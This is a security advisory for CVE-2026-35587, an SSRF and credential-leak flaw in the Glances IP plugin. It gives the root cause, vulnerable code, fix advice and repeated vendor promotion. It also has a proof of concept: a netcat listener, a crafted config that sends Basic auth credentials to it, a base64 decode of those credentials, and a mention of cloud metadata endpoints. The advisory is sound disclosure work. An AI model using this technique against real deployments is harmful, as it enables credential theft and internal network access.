CVE-2026-35587 is a high-severity server-side request forgery (SSRF) vulnerability in glances (pip), affecting versions < 4.5.4. It is fixed in 4.5.4.
Summary A Server-Side Request Forgery (SSRF) vulnerability exists in the Glances IP plugin due to improper validation of the publicapi configuration parameter. The value of publicapi is used directly in outbound HTTP requests without any scheme restriction or hostname/IP validation. An attacker who can modify the Glances configuration can force the application to send requests to arbitrary internal or external endpoints. Additionally, when publicusername and publicpassword are set, Glances automatically includes these credentials in the Authorization: Basic header, resulting in credential leakage to attacker-controlled servers. This vulnerability can be exploited to: Access internal network services (e.g., 127.0.0.1, 192.168.x.x) Retrieve sensitive data from cloud metadata endpoints (e.g., 169.254.169.254) Exfiltrate credentials via outbound HTTP requests The issue arises because publicapi is passed directly to the HTTP client (urlopenauth) without validation, allowing unrestricted outbound connections and unintended disclosure of sensitive information. Details The vulnerability exists in the Glances IP plugin where the publicapi configuration value is used to fetch public IP information. This value is read directly from the configuration file and passed to the HTTP client without any validation. Root Cause In glances/plugins/ip/init.py, the publicapi parameter is retrieved from configuration and later used to initialize a background thread responsible for making HTTP requests: There is no validation performed on: URL scheme (e.g., http, https, file) Hostname or resolved IP address Internal or restricted IP ranges Unsafe HTTP Request Handling The request is executed via urlopenauth() in glances/globals.py: This function: Accepts any URL passed to it Automatically attaches a Basic Authorization header Does not enforce any restrictions on destination PoC SSRF via publicapi (Glances IP Plugin) Prerequisites Glances installed Two terminals Step 1 Start listener (Terminal 1) nc -lvnp 9999 Step 2 Create malicious config (Terminal 2) mkdir -p ~/.config/glances cat > ~/.config/glances/glances.conf << 'EOF' [ip] publicdisabled=False publicapi=http://127.0.0.1:9999/ssrf-poc publicusername=apiuser publicpassword=S3cr3tP@ss EOF Step 3 Start Glances glances --webserver Step 4 Observe SSRF request (Terminal 1) GET /ssrf-poc HTTP/1.1 Host: 127.0.0.1:9999 User-Agent: Python-urllib/3.x Authorization: Basic YXBpdXNlcjpTM2NyM3RQQHNz Step 5 Decode leaked credentials echo "YXBpdXNlcjpTM2NyM3RQQHNz" | base64 -d Output: apiuser:S3cr3tP@ss Step 6 Confirm data via API curl -s http://127.0.0.1:61208/api/4/ip Impact This vulnerability allows an attacker to control outbound HTTP requests made by the Glances IP plugin via the publicapi configuration parameter. Server-Side Request Forgery (SSRF): The application can be forced to send requests to arbitrary endpoints, including internal services and localhost. Credential Leakage: When publicusername and publicpassword are configured, they are automatically sent in the Authorization: Basic header to any target defined in publicapi, exposing credentials to attacker-controlled servers. Internal Network Access: The vulnerability enables access to internal resources such as: 127.0.0.1 (localhost services) Private network ranges (192.168.x.x, 10.x.x.x, 172.16.x.x) Cloud Metadata Exposure: The application can be directed to query cloud metadata endpoints such as: http://169.254.169.254/ potentially exposing sensitive credentials (e.g., IAM tokens in cloud environments) Data Injection / Manipulation: Responses from attacker-controlled servers are accepted and stored by Glances, then exposed via /api/4/ip, allowing injection of arbitrary data into the application. NOTE Vulnerability Location The issue originates from how the publicapi configuration value is handled and used without validation. Source of user-controlled input File: glances/plugins/ip/init.py (around lines ~64–82) self.publicapi = self.getconfvalue("publicapi", default=[None])[0] self.publicusername = self.getconfvalue("publicusername", default=[None])[0] self.publicpassword = self.getconfvalue("publicpassword", default=[None])[0] publicapi is fully user-controlled via configuration No validation is applied at this stage Missing validation before usage self.publicdisabled = ( self.getconfvalue('publicdisabled', default='False')[0].lower() != 'false' or self.publicapi is None or self.publicfield is None ) Only checks if the value is None No validation of: URL scheme Hostname IP address range Vulnerable sink (critical point) self.publicipthread = ThreadPublicIpAddress( url=self.publicapi, # ← user-controlled input username=self.publicusername, password=self.publicpassword, refreshinterval=self.publicaddressrefreshinterval, ) The user-controlled publicapi is passed directly into a network request This is the SSRF entry point Unsafe HTTP execution File: glances/globals.py (around lines ~360+) def urlopenauth(url, username, password, timeout=3): return urlopen( Request( url, # ← no validation at all headers={ 'Authorization': 'Basic ' + base64.b64encode(f'{username}:{password}'.encode()).decode() }, ), timeout=timeout, ) Accepts any URL Sends request blindly Automatically attaches credentials to any destination Root Cause A user-controlled configuration value (publicapi) is passed directly into an HTTP request without validation of scheme or destination, resulting in SSRF and credential leakage. Recommendation The fix must be applied before the URL is used, specifically in the IP plugin (init.py). Enforce scheme restrictions Allow only: http https Reject: file:// gopher:// ftp:// any non-HTTP protocol This prevents protocol abuse and local file access Validate destination host Resolve the hostname to an IP address Check the resolved IP against restricted ranges Block if the IP is: Loopback → 127.0.0.0/8 Private → 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16 Link-local → 169.254.0.0/16 (cloud metadata services) This prevents: Internal network probing AWS/GCP/Azure metadata access localhost abuse Enforce validation before thread creation The validation must occur before initializing: ThreadPublicIpAddress(...) If validation fails: Disable the plugin Do not send any request Trust boundary clarification urlopen_auth() is a low-level utility It should not be responsible for validation The caller (IP plugin) must ensure: Only safe, external URLs are passed Why This Fix Works Scheme validation blocks protocol-based attacks IP validation blocks internal and cloud targets Combined, they eliminate the SSRF attack surface while preserving legitimate use cases (public IP APIs)
Untrusted input controls the target URL of a server-initiated request, which may reach internal services not otherwise accessible from outside. Typical impact: access to internal metadata services, internal APIs, or cloud credentials.
CVE-2026-35587 has a CVSS score of 8.8 (High). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment.
A fixed version is available (4.5.4). Upgrading removes the vulnerable code path.
pip
glances (< 4.5.4)glances → 4.5.4 (pip)Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter instead of chasing every advisory.
Kodem's runtime-powered SCA identifies whether CVE-2026-35587 is reachable in your applications. Explore open-source security for your team.
See if CVE-2026-35587 is reachable in your applications. Get a demo
Already deployed Kodem? See CVE-2026-35587 in your environment →Upgrade glances to 4.5.4 or later to resolve this vulnerability.
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
CVE-2026-35587 is a high-severity server-side request forgery (SSRF) vulnerability in glances (pip), affecting versions < 4.5.4. It is fixed in 4.5.4. Untrusted input controls the target URL of a server-initiated request, which may reach internal services not otherwise accessible from outside.
CVE-2026-35587 has a CVSS score of 8.8 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
glances (pip) versions < 4.5.4 is affected.
Yes. CVE-2026-35587 is fixed in 4.5.4. Upgrade to this version or later.
Whether CVE-2026-35587 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
Upgrade glances to 4.5.4 or later.